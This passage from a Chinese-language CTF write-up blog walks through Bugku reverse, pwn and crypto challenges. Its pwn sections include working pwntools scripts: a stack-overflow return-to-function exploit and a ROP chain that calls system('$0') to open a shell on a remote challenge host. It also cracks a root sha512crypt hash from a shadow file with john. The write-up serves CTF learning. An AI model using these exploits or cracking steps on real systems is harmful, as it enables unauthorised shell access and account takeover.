return super.onOptionsItemSelected(item);
}

static {
System.loadLibrary("lhm");
}
}

解题待定..….我先去学下java

逆向入门

下载得到一个admin.exe,运行提示,您的电脑版本不支持

file一下该文件,得到:

1569135788843

发现它并不是一个exe文件,是一个ASCII text文件,使用cat得到该文件的类容:

1


是一个base64的照片格式,还原扫码得到flag:bugku{inde_9882ihsd8-0}

love

下载下来发现一个reverse_3.exe文件,运行之后提示“没有相应的动态链接库”,查看文件类型

1569136396861

用ida打开,找到相应main函数的地方进行反编译,

1569136521562

输入接收是通过一个函数来实现的,点入查看,发现有一串函数连续调用,然后查看一些字符串,得到,发现:

1569137652632

怀疑上面的函数是经过base64加密而成,然后进行其他运算,最后与e3nifIH9b_C@n@dH进行比较,可得到相应flag,所以我们进行逆向:

1
2
3
4
5
6
7
8
9
10
#encoding=utf8
import base64

str="e3nifIH9b_C@n@dH"
flag=""

for i in range(len(str)):
flag+=chr(ord(str[i])-i)
flag=base64.b64decode(flag).decode("utf-8")
print("flag"+flag)

Mountain climbing

查看文件类型:

1569140529945

用ida打开:

1569140989972

发现只有一个start,怀疑是加过壳,经过PEID扫描发现经过Upx压缩,用对应工具脱壳,之后用ida打开,进入main函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
__int64 main_0()
{
int v0; // edx
__int64 v1; // ST04_8
char v3; // [esp+0h] [ebp-160h]
int v4; // [esp+D0h] [ebp-90h]
int j; // [esp+DCh] [ebp-84h]
int i; // [esp+E8h] [ebp-78h]
char Str[104]; // [esp+F4h] [ebp-6Ch]

//使用通用随机算法生成种子
srand(0xCu);
j_memset(&unk_423D80, 0, 0x9C40u);
for ( i = 1; i <= 20; ++i )
{
for ( j = 1; j <= i; ++j )
dword_41A138[100 * i + j] = rand() % 100000;
}
((void (__cdecl *)(const char *, char))sub_41134D)("input your key with your operation can get the maximum:", v3);
sub_411249("%s", (unsigned int)Str);
//str的长度只有19
if ( j_strlen(Str) == 19 )
{
//经过sub_41114F处理
sub_41114F(Str);
v4 = 0;
j = 1;
i = 1;
dword_423D78 += dword_41A138[101];
//遍历19个字符串,当当前字符是L时,dword_423D78如代码变化,如果不是L也不是R则停止,放出报错信息,如果是R则如代码变化,也就是说字符串中只有L和R两种字符。
while ( v4 < 19 )
{
//76的ASCII是L
if ( Str[v4] == 76 )
{
dword_423D78 += dword_41A138[100 * ++i + j];
}
else
{
//82的ASCII是R
if ( Str[v4] != 82 )
{
((void (__cdecl *)(const char *, char))sub_41134D)("error\n", v3);
system("pause");
goto LABEL_18;
}
dword_423D78 += dword_41A138[100 * ++i + ++j];
}
++v4;
}
sub_41134D("your operation can get %d points\n", dword_423D78);
system("pause");
}
else
{
((void (__cdecl *)(const char *, char))sub_41134D)("error\n", v3);
system("pause");
}
LABEL_18:
HIDWORD(v1) = v0;
LODWORD(v1) = 0;
return v1;
}

点入sub_41114F函数,一直点下去,发现一个这样的函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
BOOL __cdecl sub_411750(LPCVOID lpAddress, int a2, int a3)
{
int v3; // ST1C_4
DWORD flOldProtect; // [esp+D4h] [ebp-2Ch]
struct _MEMORY_BASIC_INFORMATION Buffer; // [esp+E0h] [ebp-20h]

VirtualQuery(lpAddress, &Buffer, 0x1Cu);
VirtualProtect(Buffer.BaseAddress, Buffer.RegionSize, 0x40u, &Buffer.Protect);
while ( 1 )
{
//
v3 = a2--;
if ( !v3 )
break;
*(_BYTE *)lpAddress ^= a3;
lpAddress = (char *)lpAddress + 1;
}
return VirtualProtect(Buffer.BaseAddress, Buffer.RegionSize, Buffer.Protect, &flOldProtect);
}

Pwn

pwn1

访问nc 114.116.54.89 10001

打印一下当前目录的文件,会发现:

1563351851778

直接 cat flag即可

flag{6979d853add353c9}

PWN2

1563355105656

下载文件,看一下开了什么防护:

1563355147688

没有栈溢出防护,随机化地址也没有。

用ida打开看看:

1563355286144

发现这个文件存在shell,所以大概思路就是利用read函数溢出覆盖到getshell的位置,由于这是调用静态的链接库,所以相对位移是不变的,直接可以得到此时shell的位置

1563355758994

看看read函数中的参数s的数组大小:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
-0000000000000030 s               db ?
-000000000000002F db ? ; undefined
-000000000000002E db ? ; undefined
-000000000000002D db ? ; undefined
-000000000000002C db ? ; undefined
-000000000000002B db ? ; undefined
-000000000000002A db ? ; undefined
-0000000000000029 db ? ; undefined
-0000000000000028 db ? ; undefined
-0000000000000027 db ? ; undefined
-0000000000000026 db ? ; undefined
-0000000000000025 db ? ; undefined
-0000000000000024 db ? ; undefined
-0000000000000023 db ? ; undefined
-0000000000000022 db ? ; undefined
-0000000000000021 db ? ; undefined
-0000000000000020 db ? ; undefined
-000000000000001F db ? ; undefined
-000000000000001E db ? ; undefined
-000000000000001D db ? ; undefined
-000000000000001C db ? ; undefined
-000000000000001B db ? ; undefined
-000000000000001A db ? ; undefined
-0000000000000019 db ? ; undefined
-0000000000000018 db ? ; undefined
-0000000000000017 db ? ; undefined
-0000000000000016 db ? ; undefined
-0000000000000015 db ? ; undefined
-0000000000000014 db ? ; undefined
-0000000000000013 db ? ; undefined
-0000000000000012 db ? ; undefined
-0000000000000011 db ? ; undefined
-0000000000000010 db ? ; undefined
-000000000000000F db ? ; undefined
-000000000000000E db ? ; undefined
-000000000000000D db ? ; undefined
-000000000000000C db ? ; undefined
-000000000000000B db ? ; undefined
-000000000000000A db ? ; undefined
-0000000000000009 db ? ; undefined
-0000000000000008 db ? ; undefined
-0000000000000007 db ? ; undefined
-0000000000000006 db ? ; undefined
-0000000000000005 db ? ; undefined
-0000000000000004 db ? ; undefined
-0000000000000003 db ? ; undefined
-0000000000000002 db ? ; undefined
-0000000000000001 db ? ; undefined
+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables

也就是说,覆盖0x30+0x8才能进入return,所以直接可以写脚本:

1
2
3
4
5
6
from pwn import *
p = remote('114.116.54.89','10003')
payload = 'a'*0x38+p64(0x400751)
p.recvline()
p.sendline(payload)
p.interactive()

flag{n0w_y0u_kn0w_the_Stack0verfl0w}

PWN4

下载文件,查看一下保护机制:

1563436338733

没有栈溢出防护,可执行,没有地址随机化,有代码可执行段。

在ida64中打开,先看看main函数:

1
2
3
4
5
6
7
8
9
10
11
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
char s; // [rsp+0h] [rbp-10h]
memset(&s, 0, 0x10uLL);
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
puts("Come on,try to pwn me");
read(0, &s, 0x30uLL);
puts("So~sad,you are fail");
return 0LL;
}

没有栈溢出防护,而且有read函数,可以进行栈溢出,现在我们需要找到可以执行的shell位置,

shift+F12 查看文件中的字符串,看看有没有可疑字符串:

1563439194047

里面发现存在system函数,以及敏感字$0$0在linux中为为shell或shell脚本的名称system()会调用fork()产生子进程,由子进程来调用/bin/sh -c string来执行参数string字符串所代表的命令,此命令执行完后随即返回原调用的进程。

所以如果将$0作为system的参数,能达到传入'/bin/sh'一样的效果。

接着我们就可以开始传入参数,64位是利用寄存器进行传参,32位使用栈进行传参

这里我们需要找到pop | ret 来进行相应的赋值,利用ROPgadget:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
kali:Desktop # ROPgadget --binary pwn4 --only 'pop|ret'
Gadgets information
============================================================
0x00000000004007cc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007ce : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007d0 : pop r14 ; pop r15 ; ret
0x00000000004007d2 : pop r15 ; ret
0x00000000004007cb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007cf : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400630 : pop rbp ; ret
0x00000000004007d3 : pop rdi ; ret #选用这个
0x00000000004007d1 : pop rsi ; pop r15 ; ret
0x00000000004007cd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400541 : ret

这里注意一下原因:我们需要找出 pop | ret来进行传值,而上述只有rdi是可以存入数据,rbpr15是called saved

然后我们还需要找到$0的位置和调用system函数的位置

1563441211421

1
2
3
4
kali:Desktop # ROPgadget --binary pwn4 --string '\$0'
Strings information
============================================================
0x000000000060111f : $0

现在可以开始写脚本:

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *

p = remote('114.116.54.89','10004')

pop_rdi = 0x00000000004007d3
sys_addr = 0x40075A
sh_addr = 0x000000000060111f

payload = 'a'*0x18 + p64(pop_rdi)+p64(sh_addr)+p64(sys_addr)
p.recvline()
p.sendline(payload)
p.interactive()

得到flag{264bc50112318cd6e1a67b0724d6d3af}

Crypto

easy_crypto

1
0010 0100 01 110 1111011 11 11111 010 000 0 001101 1010 111 100 0 001101 01111 000 001101 00 10 1 0 010 0 000 1 01111 10 11110 101011 1111101

打开链接,发现这样的一段字符串,可以看出是莫斯电码,

1564762933081

根据上表进行相应的解码程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#owner=houhuiting
#type=abstract
string=input()
key=string.split(" ")
dictionary= {'01': 'A',
'1000': 'B',
'1010': 'C',
'100':'D',
'0':'E',
'0010':'F',
'110': 'G',
'0000': 'H',
'00': 'I',
'0111':'J',
'101': 'K',
'0100': 'L',
'11': 'M',
'10': 'N',
'111': 'O',
'0110': 'P',
'1101': 'Q',
'010': 'R',
'000': 'S',
'1': 'T',
'001': 'U',
'0001': 'V',
'011': 'W',
'1001': 'X',
'1011': 'Y',
'1100': 'Z',
'01111': '1',
'00111': '2',
'00011': '3',
'00001': '4',
'00000': '5',
'10000': '6',
'11000': '7',
'11100': '8',
'11110': '9',
'11111': '0',
'001100': '?',
'10010': '/',
'101101': ')',
'100001': '-',
'010101': '.',
'110011':',',
'011010':'@',
'111000':':',
'101010':':',
'10001':'=',
'011110':"'",
'101011':'!',
'001101':'_',
'010010':'"',
'10110':'(',
'1111011':'{',
'1111101':'}'
};
for item in key:
# print(dictionary[item],end='')
print(dictionary[item].lower(),end='')

解出flag:FLAG{M0RSE_CODE_1S_INTEREST1N9!}

但是交上去是错的,换成小写试试,flag{m0rse_code_1s_interest1n9!}成功

散乱的密文

lf5{ag024c483549d7fd@@1}
一张纸条上凌乱的写着2 1 6 5 3 4

2 1 6 5 3 4
l f 5 { a g
0 2 4 c 4 8
3 5 4 9 d 7
f d @ @ 1 }

按照上述顺序弄出,得到flag{52048c453d794df1}

ps: 将后面两个@@去掉

凯撒部长的奖励

给出一串字符串:

1
MSW{byly_Cm_sIol_lYqUlx_yhdIs_Cn_Wuymul_il_wuff_bcg_pCwnIl_cm_u_Yrwyffyhn_guh_cz_sio_quhn_ni_ayn_bcm_chzilguncihm_sio_wuh_dich_om}

直接凯撒解密:

1
SYC{here_Is_yOur_rEwArd_enjOy_It_Caesar_or_call_him_vIctOr_is_a_Excellent_man_if_you_want_to_get_his_informations_you_can_join_us}

一段base64

打开解题链接,发现有个flag.txt,说是base64,直接解码(用在线网站解码的话很容易卡死,可能是数据太多)

这里决定用python脚本来完成解密,后面紧跟着一堆加密形式,在脚本中呈现效果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#coding=utf-8
import urllib.parse
import base64
import re

#第一层base64解密
with open('1.txt') as f:
cipher1 = f.read().encode('utf-8')
plain1 = base64.b64decode(cipher1).decode("utf-8")

# print(plain1)
# 只有0-7数字 ,怀疑是八进制解码,试试看
cipher2 = plain1
cipher2 = re.findall(r'\d+',cipher2)
# print(cipher2)
plain2 = ''
for i in cipher2:
plain2 += chr(int(i,8))
# print(plain2)
#现在解出来之后编程了16进制,再次解码
cipher3 = plain2
cipher3 = re.findall(r'\d+',cipher3)
# print(cipher3)
plain3 = ''
for i in cipher3:
plain3 += chr(int(i,16))
# print(plain3)

#现在得到的编码格式是udd*,推测为unicode
cipher4 = plain3
cipher4 = re.findall(r'u[\d\w]+',cipher4)
cipher4 = ''.join(cipher4).replace(r'u',r'\u')
# print(cipher4)
# python3没有decode可用,所以这里就这样弄了
plain4 = cipher4.encode('utf-8').decode("unicode_escape")
# print(plain4)

#将得到的数字转成ASCII
cipher5 = re.findall(r'\d+',plain4)
plain5 = ''
for i in cipher5:
plain5+=chr(int(i))
# print(plain5)

#现在是url16进制
cipher6 = re.findall(r'\d+\w?',plain5)
plain6 = ''
for i in cipher6:
plain6 += chr(int(i,16))
# print(plain6)

#现在是url 10进制,将其转化为ASCII即可
cipher7 = re.findall(r'\d+',plain6)
plain7 = ''
for i in cipher7:
plain7 += chr(int(i))
plain7 = urllib.parse.unquote(plain7)
print(plain7)

1568913099204

flag{ctf_tfc201717qwe}

.!?

1570279907943

一个ook形式的加密,直接在线解密

1570279971465

+[]-

1570280133069

一段brainfuck加密,还是在线解密

1570280252723

奇怪的密码

1570280637305

看到这种没见过的古典密码,习惯先看看ASCII,看上面的字符串,€符号像{,那么前面四个字母可能就是flag

字母 ASCII 字母 ASCII
g 103 f 102
n 110 l 108
d 100 a 97
k 107 g 103

发现,这四个貌似间隔是1,2,3,4

所以想着是不是顺次替换,直接在python上通过chr会产生报错,因为€的编码是8364,chr只能处理256之内的ASCII,所以我们将相应编码通过程序得到:

102 108 97 103 8359 108 101 105 95 99 105 95 106 105 97 109 105

然后通过在线工具进行解密:

1570590553945

得到文本信息:flag₧lei_ci_jiami

尝试flag格式,最后得到flag{lei_ci_jiami}

托马斯.杰斐逊

1570590946343

用一般方法试着解密,发现结果是错误的。

百度一下托马斯·杰斐逊,发现:

1570622091414

现在开始直接利用该方法进行解密:

  1. 先将字母表按照密钥顺序排列:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    2: <KPBELNACZDTRXMJQOYHGVSFUWI <
    5: <IHFRLABEUOTSGJVDKCPMNZQWXY <
    1: <ZWAXJGDLUBVIQHKYPNTCRMOSFE <
    3: <BDMAIZVRNSJUWFHTEQGYXPLOCK <
    6: <AMKGHIWPNYCJBFZDRUSLOQXVET <
    4: <RPLNDVHGFCUKTEBSXQYIZMJWAO <
    9: <QWATDSRFHENYVUBMCOIKZGJXPL <
    7: <GWTHSPYBXIZULVKMRAFDCEONJQ <
    8: <NOZUTWDCVRJLXKISEFAPMYGHBQ <
    14: <XPHKZGJTDSENYVUBMLAOIRFCQW <
    10: <WABMCXPLTDSRJQZGOIKFHENYVU <
    13: <BMCSRFHLTDENQWAOXPYVUIKZGJ <
    11: <XPLTDAOIKFZGHENYSRUBMCQWVJ <
    12: <TDSWAYXPLVUBOIKZGJRFHENMCQ <
  2. 然后根据密文将每行的首字母变为相应密文

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    HGVSFUWIKPBELNACZDTRXMJQOY
    CPMNZQWXYIHFRLABEUOTSGJVDK
    BVIQHKYPNTCRMOSFEZWAXJGDLU
    TEQGYXPLOCKBDMAIZVRNSJUWFH
    SLOQXVETAMKGHIWPNYCJBFZDRU
    XQYIZMJWAORPLNDVHGFCUKTEBS
    WATDSRFHENYVUBMCOIKZGJXPLQ
    CEONJQGWTHSPYBXIZULVKMRAFD
    RJLXKISEFAPMYGHBQNOZUTWDCV
    QWXPHKZGJTDSENYVUBMLAOIRFC
    GOIKFHENYVUWABMCXPLTDSRJQZ
    LTDENQWAOXPYVUIKZGJBMCSRFH
    ENYSRUBMCQWVJXPLTDAOIKFZGH
    SWAYXPLVUBOIKZGJRFHENMCQTD

    1570624454125

    得到flag{XSXSBUGKUADMIN}

    输入发现不对,但题目明确说了是解密的内容,最后发现flag是小写,

    flag{xsxsbugkuadmin}

zip伪加密

直接在winhex中修改:

1570626145427

将图中所示改成00即可

解压得到flag{Adm1N-B2G-kU-SZIP}

告诉你个秘密(ISCCCTF)

得到下面这样的字符串:

1
2
63 6A 56 35 52 79 42 73 63 44 6C 4A 49 45 4A 71 54 53 42 30 52 6D 68 43
56 44 5A 31 61 43 42 35 4E 32 6C 4B 49 46 46 7A 57 69 42 69 61 45 30 67

看起来就像是16进制,使用16进制进行编码,然后将其变为ASCII

1
cjV5RyBscDlJIEJqTSB0RmhCVDZ1aCB5N2lKIFFzWiBiaE0g

开始以为是md5,发现不能解密,尝试常用的加密方式进行解密,发现是base64,

1
r5yG  lp9I  BjM  tFhB T6uh y7iJ QsZ bhM

发现r5yg中间包含的是字母T,将所有的解出为tongyuan

发现不对,试试大写:TONGYUAN,发下flag格式就是大写

这不是md5

1
66 6c 61 67 7b 61 65 37 33 35 38 37 62 61 35 36 62 61 65 66 35 7d

发现跟上题思路类似,解出flag{ae73587ba56baef5}

贝斯家族

1
@iH<,{bdR2H;i6*Tm,Wx2izpx2!

将知道的base16,32,64都尝试一遍,发现不能解码,尝试base58,91,最后发现是base91编码,解密网站是:http://ctf.ssleye.com/base91.html,但是可能需要收费

还有一种选择是,下载这个解码软件:

  • http://base91.sourceforge.net/

flag{554a5058c9021c76}

富强民主

这是一个核心价值观编码

直接在线解密:flag{90025f7fb1959936}

python

得到两个文件

challenge.py

1
2
3
4
5
6
7
8
from N1ES import N1ES
import base64
key =
#利用函数将key进行加密
n1es = N1ES(key)
flag = "N1CTF{*****************************************}"
cipher = n1es.encrypt(flag)
print base64.b64encode(cipher) #HRlgC2ReHW1/WRk2DikfNBo1dl1XZBJrRR9qECMNOjNHDktBJSxcI1hZIz07YjVx

N1ES.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# -*- coding: utf-8 -*-
def round_add(a, b):
f = lambda x, y: x + y - 2 * (x & y)
res = ''
for i in range(len(a)):
res += chr(f(ord(a[i]), ord(b[i])))
return res

def permutate(table, block):
return list(map(lambda x: block[x], table))

def string_to_bits(data):
#将key中的变为ASCII
data = [ord(c) for c in data]
#一个字符是一个字节,一个字节是八位
l = len(data) * 8
#将其中的所有位置为0
result = [0] * l
pos = 0
for ch in data:
for i in range(0,8):
#将其中每个bit进行处理
#但是这里的(ch>>i) & 1 -->貌似把&1去掉也没有什么问题
result[(pos<<3)+i] = (ch>>i) & 1
pos += 1
return result

s_box = [54, 132, 138, 83, 16, 73, 187, 84, 146, 30, 95, 21, 148, 63, 65, 189, 188, 151, 72, 161, 116, 63, 161, 91, 37, 24, 126, 107, 87, 30, 117, 185, 98, 90, 0, 42, 140, 70, 86, 0, 42, 150, 54, 22, 144, 153, 36, 90, 149, 54, 156, 8, 59, 40, 110, 56,1, 84, 103, 22, 65, 17, 190, 41, 99, 151, 119, 124, 68, 17, 166, 125, 95, 65, 105, 133, 49, 19, 138, 29, 110, 7, 81, 134, 70, 87, 180, 78, 175, 108, 26, 121, 74, 29, 68, 162, 142, 177, 143, 86, 129, 101, 117, 41, 57, 34, 177, 103, 61, 135, 191, 74, 69, 147, 90, 49, 135, 124, 106, 19, 89, 38, 21, 41, 17, 155, 83, 38, 159, 179, 19, 157, 68, 105, 151, 166, 171, 122, 179, 114, 52, 183, 89, 107, 113, 65, 161, 141, 18, 121, 95, 4, 95, 101, 81, 156, 17, 190, 38, 84, 9, 171, 180, 59, 45, 15, 34, 89, 75, 164, 190, 140, 6, 41, 188, 77, 165, 105, 5, 107, 31, 183, 107, 141, 66, 63, 10, 9, 125, 50, 2, 153, 156, 162, 186, 76, 158, 153, 117, 9, 77, 156, 11, 145, 12, 169, 52, 57, 161, 7, 158, 110, 191, 43, 82, 186, 49, 102, 166, 31, 41, 5, 189, 27]

def generate(o):
k = permutate(s_box,o)
b = []
for i in range(0, len(k), 7):
b.append(k[i:i+7] + [1])
c = []
for i in range(32):
pos = 0
x = 0
for j in b[i]:
x += (j<<pos)
pos += 1
c.append((0x10001**x) % (0x7f))
return c

class N1ES:
def __init__(self, key):
#判断一下key的长度是否是24
if (len(key) != 24 or isinstance(key, bytes) == False ):
raise Exception("key must be 24 bytes long")
self.key = key
#生成密钥
self.gen_subkey()

def gen_subkey(self):
#将字符串变为bits
o = string_to_bits(self.key)
k = []
for i in range(8):
o = generate(o)
k.extend(o)
o = string_to_bits([chr(c) for c in o[0:24]])
self.Kn = []
for i in range(32):
self.Kn.append(map(chr, k[i * 8: i * 8 + 8]))
return

def encrypt(self, plaintext):
if (len(plaintext) % 16 != 0 or isinstance(plaintext, bytes) == False):
raise Exception("plaintext must be a multiple of 16 in length")
res = ''
for i in range(len(plaintext) / 16):
block = plaintext[i * 16:(i + 1) * 16]
L = block[:8]
R = block[8:]
for round_cnt in range(32):
L, R = R, (round_add(L, self.Kn[round_cnt]))
L, R = R, L
res += L + R
return res

这题就当作经验积累吧,这是个Feistel密码,他的加密和解密的算法是相同的,只是需要将密钥取反而已

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
# -*- coding: utf-8 -*-
import base64
def round_add(a,b):
f = lambda x,y: x + y - 2 * (x & y)
res = ''
for i in range(len(a)):
res += chr(f(ord(a[i]),ord(b[i])))
return res

def permutate(table,block):
return list(map(lambda x: block[x], table))

def string_to_bits(data):
data = [ord(c) for c in data]
l = len(data)*8
result = [0] * l
pos = 0
for ch in data:
for i in range(0,8):
result[(pos<<3)+i] = (ch>>i) & 1
pos += 1
return result

s_box = [54, 132, 138, 83, 16, 73, 187, 84, 146, 30, 95, 21, 148, 63, 65, 189, 188, 151, 72, 161, 116, 63, 161, 91, 37, 24, 126, 107, 87, 30, 117, 185, 98, 90, 0, 42, 140, 70, 86, 0, 42, 150, 54, 22, 144, 153, 36, 90, 149, 54, 156, 8, 59, 40, 110, 56,1, 84, 103, 22, 65, 17, 190, 41, 99, 151, 119, 124, 68, 17, 166, 125, 95, 65, 105, 133, 49, 19, 138, 29, 110, 7, 81, 134, 70, 87, 180, 78, 175, 108, 26, 121, 74, 29, 68, 162, 142, 177, 143, 86, 129, 101, 117, 41, 57, 34, 177, 103, 61, 135, 191, 74, 69, 147, 90, 49, 135, 124, 106, 19, 89, 38, 21, 41, 17, 155, 83, 38, 159, 179, 19, 157, 68, 105, 151, 166, 171, 122, 179, 114, 52, 183, 89, 107, 113, 65, 161, 141, 18, 121, 95, 4, 95, 101, 81, 156, 17, 190, 38, 84, 9, 171, 180, 59, 45, 15, 34, 89, 75, 164, 190, 140, 6, 41, 188, 77, 165, 105, 5, 107, 31, 183, 107, 141, 66, 63, 10, 9, 125, 50, 2, 153, 156, 162, 186, 76, 158, 153, 117, 9, 77, 156, 11, 145, 12, 169, 52, 57, 161, 7, 158, 110, 191, 43, 82, 186, 49, 102, 166, 31, 41, 5, 189, 27]

def generate(o):
k = permutate(s_box,o)
b = []
for i in range(0,len(k),7):
b.append(k[i:i+7]+[1])
c = []
for i in range(32):
pos = 0
x = 0
for j in b[i]:
x += (j<<pos)
pos += 1
c.append((0x10001**x) % (0x7f))
return c

class N1ES:
def __init__(self,key):
if (len(key) != 24 or isinstance(key,bytes) == False):
raise Exception("key must be 24 bytes long")
self.key = key
self.gen_subkey()

def gen_subkey(self):
o = string_to_bits(self.key)
k = []
for i in range(8):
o = generate(o)
k.extend(o)
o = string_to_bits([chr(c) for c in o[0:24]])
self.Kn = []
for i in range(32):
self.Kn.append(map(chr,k[i*8: i*8+8]))
return

def decrypt(self,plaintext):
res = ''
for i in range(len(plaintext)/16):
block = plaintext[i*16:(i + 1)*16]
L = block[:8]
R = block[8:]
for round_cnt in range(32):
#只需要将此处的取反即可
L,R = R, (round_add(L, self.Kn[31-round_cnt]))
L,R = R,L
res += L + R
return res


key = "wxy191iss00000000000cute"
nles = N1ES(key)
flag = base64.b64decode("HRlgC2ReHW1/WRk2DikfNBo1dl1XZBJrRR9qECMNOjNHDktBJSxcI1hZIz07YjVx")
flag = nles.decrypt(flag)
print flag
#N1CTF{F3istel_n3tw0rk_c4n_b3_ea5i1y_s0lv3d_/--/}

还有一种方法就是直接都算法,进行暴力破解:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import base64,string,N1ES
key = "wxy191iss00000000000cute"
c = base64.b64decode("HRlgC2ReHW1/WRk2DikfNBo1dl1XZBJrRR9qECMNOjNHDktBJSxcI1hZIz07YjVx")
n1es = N1ES.N1ES(key)
f=""
for i in xrange(3):
for j in xrange(16):
for k in string.printable:
s="x"*i*16+"x"*j+k+"x"*(48-i*16-j-1)
e=n1es.encrypt(s)
check=c[i*16+j+8]==e[i*16+j+8] if j<8 else c[i*16+j-8]==e[i*16+j-8]
if check:
f+=k
break
print f
# N1CTF{F3istel_n3tw0rk_c4n_b3_ea5i1y_s0lv3d_/--/}

进制转换

1
d87 x65 x6c x63 o157 d109 o145 b100000 d116 b1101111 o40 x6b b1100101 b1101100 o141 d105 x62 d101 b1101001 d46 o40 d71 x69 d118 x65 x20 b1111001 o157 b1110101 d32 o141 d32 d102 o154 x61 x67 b100000 o141 d115 b100000 b1100001 d32 x67 o151 x66 d116 b101110 b100000 d32 d102 d108 d97 o147 d123 x31 b1100101 b110100 d98 d102 b111000 d49 b1100001 d54 b110011 x39 o64 o144 o145 d53 x61 b1100010 b1100011 o60 d48 o65 b1100001 x63 b110110 d101 o63 b111001 d97 d51 o70 d55 b1100010 d125 x20 b101110 x20 b1001000 d97 d118 o145 x20 d97 o40 d103 d111 d111 x64 d32 o164 b1101001 x6d o145 x7e

直接python脚本解密即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#coding=utf-8

data = 'd87 x65 x6c x63 o157 d109 o145 b100000 d116 b1101111 o40 x6b b1100101 b1101100 o141 d105 x62 d101 b1101001 d46 o40 d71 x69 d118 x65 x20 b1111001 o157 b1110101 d32 o141 d32 d102 o154 x61 x67 b100000 o141 d115 b100000 b1100001 d32 x67 o151 x66 d116 b101110 b100000 d32 d102 d108 d97 o147 d123 x31 b1100101 b110100 d98 d102 b111000 d49 b1100001 d54 b110011 x39 o64 o144 o145 d53 x61 b1100010 b1100011 o60 d48 o65 b1100001 x63 b110110 d101 o63 b111001 d97 d51 o70 d55 b1100010 d125 x20 b101110 x20 b1001000 d97 d118 o145 x20 d97 o40 d103 d111 d111 x64 d32 o164 b1101001 x6d o145 x7e'
enc = data.split(' ')
ans =''

for i in enc:
tag = i[0]
if tag == 'x':
ans += chr(int(i[1:],16))
elif tag == 'o':
ans += chr(int(i[1:],8))
elif tag == 'b':
ans += chr(int(i[1:],2))
elif tag == 'd':
ans += chr(int(i[1:]))
print(ans)

得到Welcome to kelaibei. Give you a flag as a gift. flag{1e4bf81a6394de5abc005ac6e39a387b} . Have a good time~

affine

1570682541529

题目是仿射,所以猜想是flag里面内容需要仿射密码,用脚本解决

1
2
3
4
5
6
7
8
9
10
11
#coding=utf-8

enc = 'szzyfimhyzd'
ans = ''
for x in enc:
x = ord(x)
for i in range(0,26):
if x == (17*i-8)%26+97:
ans += chr(i+97)

print(ans)

得到flag:

1
flag{affineshift}

Crack it

下载一个shadow文件,查一下有关信息:

Linux操作系统下有一个文件负责所有用户的密码。那就是shadow。该文件的权限必须设置为:-r- — — (400)或者 -rw — —(600)即:Linux /etc/shadow文件是只有系统管理员才有权利进行查看和修改的文件。

使用more命令查看其中一些基本信息:

1
root@DESKTOP-OORTB87:/mnt/c/Users/X1TABLET/Desktop# more shadow                           root:$6$HRMJoyGA$26FIgg6CU0bGUOfqFB0Qo9AE2LRZxG8N3H.3BK8t49wGlYbkFbxVFtGOZqVIq3qQ6k0oetDbn2aVzdhuVQ6US.:17770:0:99999:7:::

这里使用kali中john工具进行密码爆破:

1
root@DESKTOP-OORTB87:/mnt/c/Users/X1TABLET/Desktop# john shadow                                                                                                                  Using default input encoding: UTF-8                                                                                                                                              Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])                                                                                                      Cost 1 (iteration count) is 5000 for all loaded hashes                                                                                                                           Will run 4 OpenMP threads                                                                                                                                                        Proceeding with single, rules:Single                                                                                                                                             Press 'q' or Ctrl-C to abort, almost any other key for status                                                                                                                    Warning: Only 14 candidates buffered for the current salt, minimum 16 needed for performance.                                                                                    Warning: Only 10 candidates buffered for the current salt, minimum 16 needed for performance.                                                                                    Warning: Only 15 candidates buffered for the current salt, minimum 16 needed for performance.                                                                                    Almost done: Processing the remaining buffered candidate passwords, if any.                                                                                                      Warning: Only 8 candidates buffered for the current salt, minimum 16 needed for performance.                                                                                     Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist                                                                                                            hellokitty       (root)    //这里有内容                                                                                                                                             1g 0:00:00:04 DONE 2/3 (2019-10-11 19:50) 0.2427g/s 1337p/s 1337c/s 1337C/s ilovegod..ford                                                                                       Use the "--show" option to display all of the cracked passwords reliably                                                                                                         Session 